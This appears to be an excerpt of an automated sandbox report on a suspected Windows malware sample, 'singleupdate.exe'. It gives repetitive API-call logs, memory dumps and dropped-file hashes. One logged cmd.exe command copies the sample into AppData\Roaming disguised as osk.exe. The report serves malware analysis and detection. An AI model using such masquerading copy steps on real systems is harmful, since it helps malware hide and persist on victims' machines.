| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
|
For performance reasons, the remaining 792 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Process #6: cmd.exe
67
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\WINDOWS\system32\cmd.exe" /c copy /y "C:\Users\FD1HVy\Desktop\singleupdate.exe" "C:\Users\FD1HVy\AppData\Roaming\osk.exe" |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:03:28, Reason: Child Process |
| Unmonitor | End Time: 00:03:31, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfb4 |
| Parent PID | 0xe64 (c:\users\fd1hvy\desktop\singleupdate.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F1C
0x
174
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00C00000 | 0x00C58FFF | Process Termination | - | 32-bit | - |
|
|
|
Threads
Thread 0xf1c
67
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0xc00000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\WINDOWS\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\Desktop\singleupdate.exe, type = file_attributes |
|
1 | |
| Process | Get Info | type = PROCESS_PAGE_PRIORITY |
|
1 | |
| File | Create | filename = C:\Users\FD1HVy\Desktop\singleupdate.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | - |
|
1 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Open | - |
|
1 | |
| File | Read | size = 512, size_out = 512 |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\AppData\Roaming\osk.exe, type = file_attributes |
|
2 | |
| File | Copy | source_filename = C:\Users\FD1HVy\Desktop\singleupdate.exe, destination_filename = C:\Users\FD1HVy\AppData\Roaming\osk.exe |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\AppData\Roaming\osk.exe, type = file_attributes |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 27 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #8: osk.exe
4998
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\users\fd1hvy\appdata\roaming\osk.exe |
| Command Line | "C:\Users\FD1HVy\AppData\Roaming\osk.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:32, Reason: Child Process |
| Unmonitor | End Time: 00:04:47, Reason: Self Terminated |
| Monitor Duration | 00:01:14 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6cc |
| Parent PID | 0xe64 (c:\users\fd1hvy\desktop\singleupdate.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DF4
0x
FD4
0x
714
0x
A8C
0x
840
0x
8AC
0x
F74
0x
F84
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| osk.exe | 0x00400000 | 0x004BFFFF | Marked Writable | - | 32-bit | - |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00401110 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0040EB38, 0x0040F130 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0040B764 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00417D3C |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00410838 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00413074 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0042A5C8 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0042B67C, 0x0042CC58 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00423564, 0x00429864 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00414000 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00420000, 0x0041FA70, ... |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00415904 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00416000 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00426B84 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0041C000, 0x0041B1F8 |
|
|
|
| osk.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00428BB0 |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\BOOTNXT | 0.20 KB |
MD5:
627ac254b46ce3aefd14b0a57cd49a4f
SHA1: f2f70a38f49bd0d859069665bb5ed971355f452f SHA256: cf5a8369639937456fbf26fb33b49aba64d57b302865eff6e9087b0123ec1d92 SSDeep: 6:gkGq+5VK/pRX0UXejWmXhcBCsKWiumTTQUSUWQR1/:aVcpRX08qWmSGZSPQR1 |
|
|
| C:\BOOTSECT.BAK | 8.20 KB |
MD5:
5d8cb0702ca7353571ab889226187b8f
SHA1: 43bcbc2e350b5798bbb1d0a54772706fa9422a62 SHA256: 500cf654a12e8e16fe26e3d2ddb71d3ea8cbf70cf6827b02a931a0a3dfc12075 SSDeep: 96:c202UiHGSZnV6nPt4ihC/U8remKrQUqjfyJB7y4AIwVoouPd:Q2UgsPt4ihCvresUDBm4lwVs |
|
|
| C:\588bce7c90097ed212\DHtmlHeader.html | 15.94 KB |
MD5:
53680ca733f50dfb0b9a5da92f056063
